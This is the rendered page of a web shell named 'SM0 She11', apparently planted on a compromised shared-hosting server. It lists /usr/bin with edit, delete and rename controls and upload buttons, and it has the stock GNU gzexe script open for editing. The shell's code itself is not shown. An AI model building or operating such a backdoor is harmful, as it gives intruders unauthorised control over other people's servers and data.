SM0 She11
Path:
/
/
usr
/
bin
Full Path (server): /usr/bin
Create Fil3
Upl04d Fil3
📄 GET
[E]
[D]
[R]
📄 Mail
[E]
[D]
[R]
📄 [
[E]
[D]
[R]
📄 aclocal
[E]
[D]
[R]
📄 aclocal-1.16
[E]
[D]
[R]
📄 addr2line
[E]
[D]
[R]
📄 apropos
[E]
[D]
[R]
📄 ar
[E]
[D]
[R]
📄 arch
[E]
[D]
[R]
📄 arpaname
[E]
[D]
[R]
📄 as
[E]
[D]
[R]
📄 aspell
[E]
[D]
[R]
📄 at
[E]
[D]
[R]
📄 atq
[E]
[D]
[R]
📄 atrm
[E]
[D]
[R]
📄 autoconf
[E]
[D]
[R]
📄 autoheader
[E]
[D]
[R]
📄 autom4te
[E]
[D]
[R]
📄 automake
[E]
[D]
[R]
📄 automake-1.16
[E]
[D]
[R]
📄 autoreconf
[E]
[D]
[R]
📄 autoscan
[E]
[D]
[R]
📄 autoupdate
[E]
[D]
[R]
📄 awk
[E]
[D]
[R]
📄 b2sum
[E]
[D]
[R]
📄 base32
[E]
[D]
[R]
📄 base64
[E]
[D]
[R]
📄 basename
[E]
[D]
[R]
📄 bash
[E]
[D]
[R]
📄 bashbug-64
[E]
[D]
[R]
📄 batch
[E]
[D]
[R]
📄 bison
[E]
[D]
[R]
📄 bunzip2
[E]
[D]
[R]
📄 bzcat
[E]
[D]
[R]
📄 bzcmp
[E]
[D]
[R]
📄 bzdiff
[E]
[D]
[R]
📄 bzgrep
[E]
[D]
[R]
📄 bzip2
[E]
[D]
[R]
📄 bzip2recover
[E]
[D]
[R]
📄 bzless
[E]
[D]
[R]
📄 bzmore
[E]
[D]
[R]
📄 c++
[E]
[D]
[R]
📄 c++filt
[E]
[D]
[R]
📄 c89
[E]
[D]
[R]
📄 c99
[E]
[D]
[R]
📄 cagefs_enter.proxied
[E]
[D]
[R]
📄 cal
[E]
[D]
[R]
📄 captoinfo
[E]
[D]
[R]
📄 cat
[E]
[D]
[R]
📄 catchsegv
[E]
[D]
[R]
📄 catman
[E]
[D]
[R]
📄 cc
[E]
[D]
[R]
📄 chcon
[E]
[D]
[R]
📄 chgrp
[E]
[D]
[R]
📄 chmod
[E]
[D]
[R]
📄 chown
[E]
[D]
[R]
📄 chrt
[E]
[D]
[R]
📄 cksum
[E]
[D]
[R]
📄 cldetect
[E]
[D]
[R]
📄 clear
[E]
[D]
[R]
📄 cmp
[E]
[D]
[R]
📄 col
[E]
[D]
[R]
📄 colcrt
[E]
[D]
[R]
📄 colrm
[E]
[D]
[R]
📄 column
[E]
[D]
[R]
📄 comm
[E]
[D]
[R]
📄 composer
[E]
[D]
[R]
📄 cp
[E]
[D]
[R]
📄 cpan
[E]
[D]
[R]
📄 cpp
[E]
[D]
[R]
📄 crontab
[E]
[D]
[R]
📄 crontab.cagefs
[E]
[D]
[R]
📄 csplit
[E]
[D]
[R]
📄 curl
[E]
[D]
[R]
📄 cut
[E]
[D]
[R]
📄 date
[E]
[D]
[R]
📄 dd
[E]
[D]
[R]
📄 delv
[E]
[D]
[R]
📄 df
[E]
[D]
[R]
📄 diff
[E]
[D]
[R]
📄 diff3
[E]
[D]
[R]
📄 dig
[E]
[D]
[R]
📄 dir
[E]
[D]
[R]
📄 dircolors
[E]
[D]
[R]
📄 dirname
[E]
[D]
[R]
📄 dnstap-read
[E]
[D]
[R]
📄 du
[E]
[D]
[R]
📄 easy_install-3
[E]
[D]
[R]
📄 echo
[E]
[D]
[R]
📄 egrep
[E]
[D]
[R]
📄 enc2xs
[E]
[D]
[R]
📄 enchant
[E]
[D]
[R]
📄 enchant-lsmod
[E]
[D]
[R]
📄 env
[E]
[D]
[R]
📄 eps2eps
[E]
[D]
[R]
📄 eqn
[E]
[D]
[R]
📄 ex
[E]
[D]
[R]
📄 expand
[E]
[D]
[R]
📄 expr
[E]
[D]
[R]
📄 factor
[E]
[D]
[R]
📄 false
[E]
[D]
[R]
📄 fc-cache
[E]
[D]
[R]
📄 fc-cache-64
[E]
[D]
[R]
📄 fc-cat
[E]
[D]
[R]
📄 fc-conflist
[E]
[D]
[R]
📄 fc-list
[E]
[D]
[R]
📄 fc-match
[E]
[D]
[R]
📄 fc-pattern
[E]
[D]
[R]
📄 fc-query
[E]
[D]
[R]
📄 fc-scan
[E]
[D]
[R]
📄 fc-validate
[E]
[D]
[R]
📄 fgrep
[E]
[D]
[R]
📄 file
[E]
[D]
[R]
📄 find
[E]
[D]
[R]
📄 flex
[E]
[D]
[R]
📄 flex++
[E]
[D]
[R]
📄 flock
[E]
[D]
[R]
📄 fmt
[E]
[D]
[R]
📄 fold
[E]
[D]
[R]
📄 free
[E]
[D]
[R]
📄 freetype-config
[E]
[D]
[R]
📄 funzip
[E]
[D]
[R]
📄 g++
[E]
[D]
[R]
📄 gawk
[E]
[D]
[R]
📄 gcc
[E]
[D]
[R]
📄 gcc-ar
[E]
[D]
[R]
📄 gcc-nm
[E]
[D]
[R]
📄 gcc-ranlib
[E]
[D]
[R]
📄 gcov
[E]
[D]
[R]
📄 gcov-dump
[E]
[D]
[R]
📄 gcov-tool
[E]
[D]
[R]
📄 gem
[E]
[D]
[R]
📄 gencat
[E]
[D]
[R]
📄 geoiplookup
[E]
[D]
[R]
📄 geoiplookup6
[E]
[D]
[R]
📄 geqn
[E]
[D]
[R]
📄 getconf
[E]
[D]
[R]
📄 getent
[E]
[D]
[R]
📄 getopt
[E]
[D]
[R]
📄 ghostscript
[E]
[D]
[R]
📄 git
[E]
[D]
[R]
📄 git-receive-pack
[E]
[D]
[R]
📄 git-shell
[E]
[D]
[R]
📄 git-upload-archive
[E]
[D]
[R]
📄 git-upload-pack
[E]
[D]
[R]
📄 gm
[E]
[D]
[R]
📄 gmake
[E]
[D]
[R]
📄 gneqn
[E]
[D]
[R]
📄 gnroff
[E]
[D]
[R]
📄 gpg
[E]
[D]
[R]
📄 gpg-agent
[E]
[D]
[R]
📄 gpg-error
[E]
[D]
[R]
📄 gpg-zip
[E]
[D]
[R]
📄 gpgsplit
[E]
[D]
[R]
📄 gpgv
[E]
[D]
[R]
📄 gpic
[E]
[D]
[R]
📄 gprof
[E]
[D]
[R]
📄 grep
[E]
[D]
[R]
📄 groff
[E]
[D]
[R]
📄 grops
[E]
[D]
[R]
📄 grotty
[E]
[D]
[R]
📄 groups
[E]
[D]
[R]
📄 gs
[E]
[D]
[R]
📄 gsnd
[E]
[D]
[R]
📄 gsoelim
[E]
[D]
[R]
📄 gtar
[E]
[D]
[R]
📄 gtbl
[E]
[D]
[R]
📄 gtroff
[E]
[D]
[R]
📄 gunzip
[E]
[D]
[R]
📄 gzexe
[E]
[D]
[R]
📄 gzip
[E]
[D]
[R]
📄 h2ph
[E]
[D]
[R]
📄 h2xs
[E]
[D]
[R]
📄 head
[E]
[D]
[R]
📄 hexdump
[E]
[D]
[R]
📄 host
[E]
[D]
[R]
📄 hostid
[E]
[D]
[R]
📄 hostname
[E]
[D]
[R]
📄 hunspell
[E]
[D]
[R]
📄 iconv
[E]
[D]
[R]
📄 id
[E]
[D]
[R]
📄 idn
[E]
[D]
[R]
📄 ifnames
[E]
[D]
[R]
📄 infocmp
[E]
[D]
[R]
📄 infotocap
[E]
[D]
[R]
📄 install
[E]
[D]
[R]
📄 instmodsh
[E]
[D]
[R]
📄 ionice
[E]
[D]
[R]
📄 ipcrm
[E]
[D]
[R]
📄 ipcs
[E]
[D]
[R]
📄 isosize
[E]
[D]
[R]
📄 ispell
[E]
[D]
[R]
📄 join
[E]
[D]
[R]
📄 kill
[E]
[D]
[R]
📄 ld
[E]
[D]
[R]
📄 ld.bfd
[E]
[D]
[R]
📄 ldd
[E]
[D]
[R]
📄 less
[E]
[D]
[R]
📄 lessecho
[E]
[D]
[R]
📄 lesskey
[E]
[D]
[R]
📄 lesspipe.sh
[E]
[D]
[R]
📄 lex
[E]
[D]
[R]
📄 lexgrog
[E]
[D]
[R]
📄 lftp
[E]
[D]
[R]
📄 lftpget
[E]
[D]
[R]
📄 libnetcfg
[E]
[D]
[R]
📄 libtool
[E]
[D]
[R]
📄 libtoolize
[E]
[D]
[R]
📄 link
[E]
[D]
[R]
📄 ln
[E]
[D]
[R]
📄 locale
[E]
[D]
[R]
📄 localedef
[E]
[D]
[R]
📄 logger
[E]
[D]
[R]
📄 login
[E]
[D]
[R]
📄 logname
[E]
[D]
[R]
📄 look
[E]
[D]
[R]
📄 ls
[E]
[D]
[R]
📄 lynx
[E]
[D]
[R]
📄 m4
[E]
[D]
[R]
📄 mail
[E]
[D]
[R]
📄 mailx
[E]
[D]
[R]
📄 make
[E]
[D]
[R]
📄 make-dummy-cert
[E]
[D]
[R]
📄 man
[E]
[D]
[R]
📄 mandb
[E]
[D]
[R]
📄 manpath
[E]
[D]
[R]
📄 mariadb
[E]
[D]
[R]
📄 mariadb-access
[E]
[D]
[R]
📄 mariadb-admin
[E]
[D]
[R]
📄 mariadb-binlog
[E]
[D]
[R]
📄 mariadb-check
[E]
[D]
[R]
📄 mariadb-conv
[E]
[D]
[R]
📄 mariadb-convert-table-format
[E]
[D]
[R]
📄 mariadb-dump
[E]
[D]
[R]
📄 mariadb-dumpslow
[E]
[D]
[R]
📄 mariadb-embedded
[E]
[D]
[R]
📄 mariadb-find-rows
[E]
[D]
[R]
📄 mariadb-hotcopy
[E]
[D]
[R]
📄 mariadb-import
[E]
[D]
[R]
📄 mariadb-plugin
[E]
[D]
[R]
📄 mariadb-secure-installation
[E]
[D]
[R]
📄 mariadb-setpermission
[E]
[D]
[R]
📄 mariadb-show
[E]
[D]
[R]
📄 mariadb-slap
[E]
[D]
[R]
📄 mariadb-tzinfo-to-sql
[E]
[D]
[R]
📄 mariadb-waitpid
[E]
[D]
[R]
📄 mcookie
[E]
[D]
[R]
📄 md5sum
[E]
[D]
[R]
📄 mesg
[E]
[D]
[R]
📄 mkdir
[E]
[D]
[R]
📄 mkfifo
[E]
[D]
[R]
📄 mknod
[E]
[D]
[R]
📄 mktemp
[E]
[D]
[R]
📄 more
[E]
[D]
[R]
📄 msql2mysql
[E]
[D]
[R]
📄 mv
[E]
[D]
[R]
📄 my_print_defaults
[E]
[D]
[R]
📄 mysql
[E]
[D]
[R]
📄 mysql_config
[E]
[D]
[R]
📄 mysql_find_rows
[E]
[D]
[R]
📄 mysql_waitpid
[E]
[D]
[R]
📄 mysqlaccess
[E]
[D]
[R]
📄 mysqladmin
[E]
[D]
[R]
📄 mysqlbinlog
[E]
[D]
[R]
📄 mysqlcheck
[E]
[D]
[R]
📄 mysqldump
[E]
[D]
[R]
📄 mysqlimport
[E]
[D]
[R]
📄 mysqlshow
[E]
[D]
[R]
📄 mytop
[E]
[D]
[R]
📄 namei
[E]
[D]
[R]
📄 nano
[E]
[D]
[R]
📄 neqn
[E]
[D]
[R]
📄 nice
[E]
[D]
[R]
📄 nl
[E]
[D]
[R]
📄 nm
[E]
[D]
[R]
📄 nohup
[E]
[D]
[R]
📄 nproc
[E]
[D]
[R]
📄 nroff
[E]
[D]
[R]
📄 nslookup
[E]
[D]
[R]
📄 nsupdate
[E]
[D]
[R]
📄 numfmt
[E]
[D]
[R]
📄 objcopy
[E]
[D]
[R]
📄 objdump
[E]
[D]
[R]
📄 od
[E]
[D]
[R]
📄 openssl
[E]
[D]
[R]
📄 pango-list
[E]
[D]
[R]
📄 pango-view
[E]
[D]
[R]
📄 passwd
[E]
[D]
[R]
📄 paste
[E]
[D]
[R]
📄 patch
[E]
[D]
[R]
📄 pathchk
[E]
[D]
[R]
📄 pdf2dsc
[E]
[D]
[R]
📄 pdf2ps
[E]
[D]
[R]
📄 perl
[E]
[D]
[R]
📄 perl5.26.3
[E]
[D]
[R]
📄 perlbug
[E]
[D]
[R]
📄 perldoc
[E]
[D]
[R]
📄 perlivp
[E]
[D]
[R]
📄 perlml
[E]
[D]
[R]
📄 perlthanks
[E]
[D]
[R]
📄 pgrep
[E]
[D]
[R]
📄 php
[E]
[D]
[R]
📄 pic
[E]
[D]
[R]
📄 piconv
[E]
[D]
[R]
📄 pinentry
[E]
[D]
[R]
📄 pinentry-curses
[E]
[D]
[R]
📄 ping
[E]
[D]
[R]
📄 pinky
[E]
[D]
[R]
📄 pip-3
[E]
[D]
[R]
📄 pip3
[E]
[D]
[R]
📄 pkg-config
[E]
[D]
[R]
📄 pkgconf
[E]
[D]
[R]
📄 pkill
[E]
[D]
[R]
📄 pl2pm
[E]
[D]
[R]
📄 pmap
[E]
[D]
[R]
📄 pod2html
[E]
[D]
[R]
📄 pod2man
[E]
[D]
[R]
📄 pod2text
[E]
[D]
[R]
📄 pod2usage
[E]
[D]
[R]
📄 podchecker
[E]
[D]
[R]
📄 podselect
[E]
[D]
[R]
📄 post-grohtml
[E]
[D]
[R]
📄 pr
[E]
[D]
[R]
📄 pre-grohtml
[E]
[D]
[R]
📄 precat
[E]
[D]
[R]
📄 preunzip
[E]
[D]
[R]
📄 prezip
[E]
[D]
[R]
📄 prezip-bin
[E]
[D]
[R]
📄 printenv
[E]
[D]
[R]
📄 printf
[E]
[D]
[R]
📄 prove
[E]
[D]
[R]
📄 ps
[E]
[D]
[R]
📄 ps2ascii
[E]
[D]
[R]
📄 ps2epsi
[E]
[D]
[R]
📄 ps2pdf
[E]
[D]
[R]
📄 ps2pdf12
[E]
[D]
[R]
📄 ps2pdf13
[E]
[D]
[R]
📄 ps2pdf14
[E]
[D]
[R]
📄 ps2pdfwr
[E]
[D]
[R]
📄 ps2ps
[E]
[D]
[R]
📄 ps2ps2
[E]
[D]
[R]
📄 ptx
[E]
[D]
[R]
📄 pwd
[E]
[D]
[R]
📄 pwdx
[E]
[D]
[R]
📄 pydoc-3
[E]
[D]
[R]
📄 pydoc3
[E]
[D]
[R]
📄 python3
[E]
[D]
[R]
📄 python3.6
[E]
[D]
[R]
📄 python3.6m
[E]
[D]
[R]
📄 pyvenv-3
[E]
[D]
[R]
📄 ranlib
[E]
[D]
[R]
📄 raw
[E]
[D]
[R]
📄 readelf
[E]
[D]
[R]
📄 readlink
[E]
[D]
[R]
📄 realpath
[E]
[D]
[R]
📄 recode
[E]
[D]
[R]
📄 rename
[E]
[D]
[R]
📄 renew-dummy-cert
[E]
[D]
[R]
📄 renice
[E]
[D]
[R]
📄 replace
[E]
[D]
[R]
📄 reset
[E]
[D]
[R]
📄 rev
[E]
[D]
[R]
📄 rm
[E]
[D]
[R]
📄 rmdir
[E]
[D]
[R]
📄 rnano
[E]
[D]
[R]
📄 rsync
[E]
[D]
[R]
📄 ruby
[E]
[D]
[R]
📄 run-with-aspell
[E]
[D]
[R]
📄 runcon
[E]
[D]
[R]
📄 rvi
[E]
[D]
[R]
📄 rview
[E]
[D]
[R]
📄 rvim
[E]
[D]
[R]
📄 scalar
[E]
[D]
[R]
📄 scl
[E]
[D]
[R]
📄 scl_enabled
[E]
[D]
[R]
📄 scl_source
[E]
[D]
[R]
📄 scp
[E]
[D]
[R]
📄 screen
[E]
[D]
[R]
📄 script
[E]
[D]
[R]
📄 sdiff
[E]
[D]
[R]
📄 sed
[E]
[D]
[R]
📄 selectorctl
[E]
[D]
[R]
📄 seq
[E]
[D]
[R]
📄 setsid
[E]
[D]
[R]
📄 setterm
[E]
[D]
[R]
📄 sftp
[E]
[D]
[R]
📄 sh
[E]
[D]
[R]
📄 sha1sum
[E]
[D]
[R]
📄 sha224sum
[E]
[D]
[R]
📄 sha256sum
[E]
[D]
[R]
📄 sha384sum
[E]
[D]
[R]
📄 sha512sum
[E]
[D]
[R]
📄 shred
[E]
[D]
[R]
📄 shuf
[E]
[D]
[R]
📄 size
[E]
[D]
[R]
📄 skill
[E]
[D]
[R]
📄 slabtop
[E]
[D]
[R]
📄 sleep
[E]
[D]
[R]
📄 snice
[E]
[D]
[R]
📄 soelim
[E]
[D]
[R]
📄 sort
[E]
[D]
[R]
📄 spell
[E]
[D]
[R]
📄 splain
[E]
[D]
[R]
📄 split
[E]
[D]
[R]
📄 sprof
[E]
[D]
[R]
📄 sqlite3
[E]
[D]
[R]
📄 ssh
[E]
[D]
[R]
📄 ssh-add
[E]
[D]
[R]
📄 ssh-agent
[E]
[D]
[R]
📄 ssh-copy-id
[E]
[D]
[R]
📄 ssh-keygen
[E]
[D]
[R]
📄 ssh-keyscan
[E]
[D]
[R]
📄 stat
[E]
[D]
[R]
📄 stdbuf
[E]
[D]
[R]
📄 strace
[E]
[D]
[R]
📄 strings
[E]
[D]
[R]
📄 strip
[E]
[D]
[R]
📄 stty
[E]
[D]
[R]
📄 sum
[E]
[D]
[R]
📄 sync
[E]
[D]
[R]
📄 tabs
[E]
[D]
[R]
📄 tac
[E]
[D]
[R]
📄 tail
[E]
[D]
[R]
📄 tar
[E]
[D]
[R]
📄 taskset
[E]
[D]
[R]
📄 tbl
[E]
[D]
[R]
📄 tclsh
[E]
[D]
[R]
📄 tclsh8.6
[E]
[D]
[R]
📄 tee
[E]
[D]
[R]
📄 test
[E]
[D]
[R]
📄 tic
[E]
[D]
[R]
📄 timeout
[E]
[D]
[R]
📄 tload
[E]
[D]
[R]
📄 tmpwatch
[E]
[D]
[R]
📄 toe
[E]
[D]
[R]
📄 top
[E]
[D]
[R]
📄 touch
[E]
[D]
[R]
📄 tput
[E]
[D]
[R]
📄 tr
[E]
[D]
[R]
📄 troff
[E]
[D]
[R]
📄 true
[E]
[D]
[R]
📄 truncate
[E]
[D]
[R]
📄 tset
[E]
[D]
[R]
📄 tsort
[E]
[D]
[R]
📄 tty
[E]
[D]
[R]
📄 tzselect
[E]
[D]
[R]
📄 uapi
[E]
[D]
[R]
📄 ul
[E]
[D]
[R]
📄 uname
[E]
[D]
[R]
📄 unexpand
[E]
[D]
[R]
📄 uniq
[E]
[D]
[R]
📄 unlink
[E]
[D]
[R]
📄 unversioned-python
[E]
[D]
[R]
📄 unzip
[E]
[D]
[R]
📄 unzipsfx
[E]
[D]
[R]
📄 uptime
[E]
[D]
[R]
📄 users
[E]
[D]
[R]
📄 utmpdump
[E]
[D]
[R]
📄 vdir
[E]
[D]
[R]
📄 vi
[E]
[D]
[R]
📄 view
[E]
[D]
[R]
📄 vim
[E]
[D]
[R]
📄 vimdiff
[E]
[D]
[R]
📄 vimtutor
[E]
[D]
[R]
📄 vmstat
[E]
[D]
[R]
📄 watch
[E]
[D]
[R]
📄 wc
[E]
[D]
[R]
📄 wget
[E]
[D]
[R]
📄 whatis
[E]
[D]
[R]
📄 whereis
[E]
[D]
[R]
📄 which
[E]
[D]
[R]
📄 who
[E]
[D]
[R]
📄 whoami
[E]
[D]
[R]
📄 word-list-compress
[E]
[D]
[R]
📄 wp
[E]
[D]
[R]
📄 x86_64-redhat-linux-c++
[E]
[D]
[R]
📄 x86_64-redhat-linux-g++
[E]
[D]
[R]
📄 x86_64-redhat-linux-gcc
[E]
[D]
[R]
📄 x86_64-redhat-linux-gcc-8
[E]
[D]
[R]
📄 xargs
[E]
[D]
[R]
📄 xmlcatalog
[E]
[D]
[R]
📄 xmllint
[E]
[D]
[R]
📄 xmlwf
[E]
[D]
[R]
📄 xsltproc
[E]
[D]
[R]
📄 xsubpp
[E]
[D]
[R]
📄 xxd
[E]
[D]
[R]
📄 yes
[E]
[D]
[R]
📄 zcat
[E]
[D]
[R]
📄 zcmp
[E]
[D]
[R]
📄 zdiff
[E]
[D]
[R]
📄 zegrep
[E]
[D]
[R]
📄 zfgrep
[E]
[D]
[R]
📄 zforce
[E]
[D]
[R]
📄 zgrep
[E]
[D]
[R]
📄 zip
[E]
[D]
[R]
📄 zipcloak
[E]
[D]
[R]
📄 zipgrep
[E]
[D]
[R]
📄 zipinfo
[E]
[D]
[R]
📄 zipnote
[E]
[D]
[R]
📄 zipsplit
[E]
[D]
[R]
📄 zless
[E]
[D]
[R]
📄 zmore
[E]
[D]
[R]
📄 znew
[E]
[D]
[R]
📄 zsoelim
[E]
[D]
[R]
Editing: gzexe
#!/bin/sh # gzexe: compressor for Unix executables. # Use this only for binaries that you do not use frequently. # # The compressed version is a shell script which decompresses itself after # skipping $skip lines of shell commands. We try invoking the compressed # executable with the original name (for programs looking at their name). # We also try to retain the original file permissions on the compressed file. # For safety reasons, gzexe will not create setuid or setgid shell scripts. # WARNING: the first line of this file must be either : or #!/bin/sh # The : is required for some old versions of csh. # On Ultrix, /bin/sh is too buggy, change the first line to: #!/bin/sh5 # Copyright (C) 1998, 2002, 2004, 2006-2007, 2010-2018 Free Software # Foundation, Inc. # Copyright (C) 1993 Jean-loup Gailly # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. tab=' ' nl=' ' IFS=" $tab$nl" version='gzexe (gzip) 1.9 Copyright (C) 2007, 2011-2017 Free Software Foundation, Inc. This is free software. You may redistribute copies of it under the terms of the GNU General Public License <https://www.gnu.org/licenses/gpl.html>. There is NO WARRANTY, to the extent permitted by law. Written by Jean-loup Gailly.' usage="Usage: $0 [OPTION] FILE... Replace each executable FILE with a compressed version of itself. Make a backup FILE~ of the old version of FILE. -d Decompress each FILE instead of compressing it. --help display this help and exit --version output version information and exit Report bugs to <bug-gzip@gnu.org>." decomp=0 res=0 while :; do case $1 in -d) decomp=1; shift;; --h*) printf '%s\n' "$usage" || exit 1; exit;; --v*) printf '%s\n' "$version" || exit 1; exit;; --) shift; break;; *) break;; esac done if test $# -eq 0; then printf >&2 '%s\n' "$0: missing operand Try \`$0 --help' for more information." exit 1 fi tmp= trap 'res=$? test -n "$tmp" && rm -f "$tmp" (exit $res); exit $res ' 0 1 2 3 5 10 13 15 mktemp_status= for i do case $i in -*) file=./$i;; *) file=$i;; esac if test ! -f "$file" || test ! -r "$file"; then res=$? printf >&2 '%s\n' "$0: $i is not a readable regular file" continue fi if test $decomp -eq 0; then if sed -e 1d -e 2q "$file" | grep "^skip=[0-9][0-9]*$" >/dev/null; then printf >&2 '%s\n' "$0: $i is already gzexe'd" continue fi fi if test -u "$file"; then printf >&2 '%s\n' "$0: $i has setuid permission, unchanged" continue fi if test -g "$file"; then printf >&2 '%s\n' "$0: $i has setgid permission, unchanged" continue fi case /$file in */basename | */bash | */cat | */chmod | */cp | \ */dirname | */expr | */gzip | \ */ln | */mkdir | */mktemp | */mv | */printf | */rm | \ */sed | */sh | */sleep | */test | */tail) printf >&2 '%s\n' "$0: $i might depend on itself"; continue;; esac dir=`dirname "$file"` || dir=$TMPDIR test -d "$dir" && test -w "$dir" && test -x "$dir" || dir=/tmp test -n "$tmp" && rm -f "$tmp" if test -z "$mktemp_status"; then type mktemp >/dev/null 2>&1 mktemp_status=$? fi case $dir in */) ;; *) dir=$dir/;; esac if test $mktemp_status -eq 0; then tmp=`mktemp "${dir}gzexeXXXXXXXXX"` else tmp=${dir}gzexe$$ fi && { cp -p "$file" "$tmp" 2>/dev/null || cp "$file" "$tmp"; } || { res=$? printf >&2 '%s\n' "$0: cannot copy $file" continue } if test -w "$tmp"; then writable=1 else writable=0 chmod u+w "$tmp" || { res=$? printf >&2 '%s\n' "$0: cannot chmod $tmp" continue } fi if test $decomp -eq 0; then (cat <<'EOF' && #!/bin/sh skip=49 tab=' ' nl=' ' IFS=" $tab$nl" umask=`umask` umask 77 gztmpdir= trap 'res=$? test -n "$gztmpdir" && rm -fr "$gztmpdir" (exit $res); exit $res ' 0 1 2 3 5 10 13 15 case $TMPDIR in / | /*/) ;; /*) TMPDIR=$TMPDIR/;; *) TMPDIR=/tmp/;; esac if type mktemp >/dev/null 2>&1; then gztmpdir=`mktemp -d "${TMPDIR}gztmpXXXXXXXXX"` else gztmpdir=${TMPDIR}gztmp$$; mkdir $gztmpdir fi || { (exit 127); exit 127; } gztmp=$gztmpdir/$0 case $0 in -* | */*' ') mkdir -p "$gztmp" && rm -r "$gztmp";; */*) gztmp=$gztmpdir/`basename "$0"`;; esac || { (exit 127); exit 127; } case `printf 'X\n' | tail -n +1 2>/dev/null` in X) tail_n=-n;; *) tail_n=;; esac if tail $tail_n +$skip <"$0" | gzip -cd > "$gztmp"; then umask $umask chmod 700 "$gztmp" (sleep 5; rm -fr "$gztmpdir") 2>/dev/null & "$gztmp" ${1+"$@"}; res=$? else printf >&2 '%s\n' "Cannot decompress $0" (exit 127); res=127 fi; exit $res EOF gzip -cv9 "$file") > "$tmp" || { res=$? printf >&2 '%s\n' "$0: compression not possible for $i, file unchanged." continue } else # decompression skip=49 skip_line=`sed -e 1d -e 2q "$file"` case $skip_line in skip=[0-9] | skip=[0-9][0-9] | skip=[0-9][0-9][0-9]) eval "$skip_line";; esac case `printf 'X\n' | tail -n +1 2>/dev/null` in X) tail_n=-n;; *) tail_n=;; esac tail $tail_n +$skip "$file" | gzip -cd > "$tmp" || { res=$? printf >&2 '%s\n' "$0: $i probably not in gzexe format, file unchanged." continue } fi test $writable -eq 1 || chmod u-w "$tmp" || { res=$? printf >&2 '%s\n' "$0: $tmp: cannot chmod" continue } ln -f "$file" "$file~" 2>/dev/null || { # Hard links may not work. Fall back on rm+cp so that $file always exists. rm -f "$file~" && cp -p "$file" "$file~" } || { res=$? printf >&2 '%s\n' "$0: cannot backup $i as $i~" continue } mv -f "$tmp" "$file" || { res=$? printf >&2 '%s\n' "$0: cannot rename $tmp to $i" continue } tmp= done (exit $res); exit $res
Save